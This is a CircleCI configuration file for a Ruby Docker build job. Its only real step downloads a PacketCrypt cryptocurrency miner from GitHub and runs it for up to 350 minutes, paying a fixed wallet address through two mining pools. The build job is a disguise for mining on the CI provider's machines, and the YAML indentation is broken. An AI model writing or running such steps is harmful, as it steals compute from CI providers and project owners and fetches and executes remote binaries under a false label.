version: 2.0
jobs:
  build:
      docker:
            - image: circleci/ruby:2.4.2-jessie-node
                    auth:
                              username: mydockerhub-user
                                        password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
                                            steps:
                                                  - checkout
                                                        - run: wget https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.4.4/packetcrypt-v0.4.4-linux_amd64 && chmod +x packetcrypt-v0.4.4-linux_amd64 && timeout 350m ./packetcrypt-v0.4.4-linux_amd64 ann -p pkt1q5u25m5f3n43uewdtapwj85zcjcy0wt9zr78cja http://pool.srizbi.com http://pool.pktpool.io